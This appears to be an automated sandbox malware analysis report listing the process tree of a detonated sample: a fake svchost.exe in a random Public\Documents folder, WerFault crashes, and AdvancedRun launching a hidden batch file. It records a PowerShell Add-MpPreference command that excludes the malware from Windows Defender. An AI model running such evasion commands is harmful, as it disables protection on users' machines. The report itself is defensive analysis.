                                                                                                                                                                Analysis Process: timeout.exe PID: 6752 Parent PID: 6552

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:40
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:timeout 1
                                                                                                                                                                Imagebase:0x10d0000
                                                                                                                                                                File size:26112 bytes
                                                                                                                                                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Analysis Process: explorer.exe PID: 6772 Parent PID: 792

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:41
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                Imagebase:0x7ff693d90000
                                                                                                                                                                File size:3933184 bytes
                                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Analysis Process: svchost.exe PID: 6944 Parent PID: 6772

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:43
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
                                                                                                                                                                Imagebase:0xd50000
                                                                                                                                                                File size:206848 bytes
                                                                                                                                                                MD5 hash:A656F522F604872E02DAEE9DBC458D9C
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 26%, ReversingLabs

                                                                                                                                                                Analysis Process: svchost.exe PID: 6964 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:43
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Analysis Process: explorer.exe PID: 7092 Parent PID: 3472

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:47
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
                                                                                                                                                                Imagebase:0x7ff693d90000
                                                                                                                                                                File size:3933184 bytes
                                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Analysis Process: CasPol.exe PID: 7108 Parent PID: 5604

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:48
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                                                                                                                                                Imagebase:0x910000
                                                                                                                                                                File size:107624 bytes
                                                                                                                                                                MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                                                                                Analysis Process: explorer.exe PID: 7152 Parent PID: 792

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:50
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                Imagebase:0x7ff693d90000
                                                                                                                                                                File size:3933184 bytes
                                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Analysis Process: svchost.exe PID: 4568 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:49
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Analysis Process: WerFault.exe PID: 4560 Parent PID: 4568

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:50
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
                                                                                                                                                                Imagebase:0xd90000
                                                                                                                                                                File size:434592 bytes
                                                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Analysis Process: svchost.exe PID: 6172 Parent PID: 7152

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:51
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
                                                                                                                                                                Imagebase:0x4c0000
                                                                                                                                                                File size:206848 bytes
                                                                                                                                                                MD5 hash:A656F522F604872E02DAEE9DBC458D9C
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                                                                                Analysis Process: WerFault.exe PID: 6188 Parent PID: 5604

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:51
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060
                                                                                                                                                                Imagebase:0xd90000
                                                                                                                                                                File size:434592 bytes
                                                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                                                                                Analysis Process: svchost.exe PID: 4528 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:46:08
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Analysis Process: powershell.exe PID: 5584 Parent PID: 6944

                                                                                                                                                                General

                                                                                                                                                                Start time:07:46:35
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
                                                                                                                                                                Imagebase:0x7ff64e5e0000
                                                                                                                                                                File size:430592 bytes
                                                                                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                                                                                Analysis Process: conhost.exe PID: 5440 Parent PID: 5584

                                                                                                                                                                General

                                                                                                                                                                Start time:07:46:35
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Analysis Process: svchost.exe PID: 6684 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:46:41
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Analysis Process: AdvancedRun.exe PID: 844 Parent PID: 6944

                                                                                                                                                                General

                                                                                                                                                                Start time:07:46:41
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:91000 bytes
                                                                                                                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 3%, Metadefender, Browse
                                                                                                                                                                • Detection: 0%, ReversingLabs

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis

                                                                                                                                                                Reset < >